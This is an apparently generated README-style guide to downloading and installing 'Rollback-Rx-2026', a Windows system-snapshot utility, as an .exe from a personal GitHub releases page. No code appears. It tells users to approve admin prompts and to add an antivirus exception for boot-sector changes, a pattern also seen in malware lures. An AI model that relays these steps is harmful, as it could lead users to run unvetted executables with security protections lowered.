Rollback-Rx-2026 serves as a system utility for Windows 11 and Windows 10. It creates snapshots of your entire computer system. If your computer encounters errors, freezes, or viral infections, you restore your system to a previous time. This process takes seconds and returns your PC to the exact state it held before the problem occurred.
This tool works at the sector level of your hard drive. It does not rely on Windows system restore points. Instead, it tracks every change made to your files, registry, and applications. You gain the ability to jump back to any hour or day captured by a snapshot.
Before you install this software, ensure your computer meets these minimum requirements:
- Operating System: Windows 10 or Windows 11 (64-bit).
- Processor: 1 GHz or faster.
- Memory: 4 GB of RAM.
- Storage: 500 MB of free disk space for the installation.
- Administrator Privileges: You must have access to an administrator account on your PC.
Follow these steps to obtain the installer for your computer:
- Visit the project release page: https://github.com/Joaop784/Rollback-Rx-2026/releases.
- Look for the section labeled "Assets" at the bottom of the latest release post.
- Click the file ending in
.exeto start the download. - Save the file to your "Downloads" folder.
Perform these actions to set up the software on your machine:
- Locate the downloaded file in your browser or your "Downloads" folder.
- Double-click the file to launch the installation wizard.
- Your computer may show a security prompt asking if you allow the app to make changes. Click "Yes" to continue.
- Follow the on-screen instructions. Choose your installation language and agree to the terms of use.
- Select the drive where you wish to track changes. Usually, this is your "C:" drive.
- Click "Install" to begin the process.
- Wait while the installer configures your hard drive sectors. Do not restart the computer until the installer informs you the process is complete.
- Finish the setup by clicking "Close" or "Exit."
A snapshot acts as a digital photograph of your system. Create snapshots before you install new programs or change settings.
- Open the Rollback-Rx-2026 application from your desktop shortcut or the Start menu.
- Locate the "Create Snapshot" button on the main dashboard.
- Enter a name for your snapshot, such as "Clean System" or "Before Software Update."
- Click "OK." The software records the current state of your files and settings.
- View your list of snapshots in the "Snapshots" tab. You see the date and time for every entry created.
Use this feature when you encounter system instability or unwanted software changes.
- Launch Rollback-Rx-2026.
- Select the "Restore" or "Rollback" menu.
- Choose a snapshot from the list that represents a time when your system worked correctly.
- Right-click the snapshot and select "Rollback to this snapshot."
- A confirmation window appears. Read the prompt and confirm your choice.
- The software restarts your computer. During the boot process, it returns your drive to the state saved in the snapshot.
- Log into your computer as normal once the process finishes. Your files and settings now reflect the chosen snapshot.
Rollback-Rx-2026 protects you against several issues:
- Accidental file deletion: If you delete a document, simply roll back the system by a few minutes to recover the file.
- Software conflicts: If a new application creates bugs, return to the state from before the installation.
- Ransomware and malware: Malicious software that damages your operating system files is wiped out when you revert your system state.
If you encounter unexpected behavior, try these steps:
- Installer fails to open: Ensure you have administrator rights. Right-click the installer and select "Run as administrator."
- Access denied errors: Close other programs before you start the installation. Some security software may block modifications to the hard drive boot sector. Add an exception for Rollback-Rx-2026 in your antivirus settings.
- System does not boot properly: If the computer fails to start, press the "Home" key during the initial computer startup screen. This opens the sub-console menu where you select a previous snapshot and restore your system without entering Windows.
- Create a baseline snapshot immediately after you finish installing your favorite applications and drivers.
- Schedule recurring snapshots at the end of every week.
- Delete old, unnecessary snapshots to free up disk space if you notice the drive filling up.
- Keep your system updated. Rollback-Rx-2026 supports your operating system, so run Windows Update regularly to ensure the software maintains compatibility.
- Test your ability to restore. Create a dummy file, take a snapshot, delete the file, and perform a rollback to ensure the process works for your specific hardware configuration.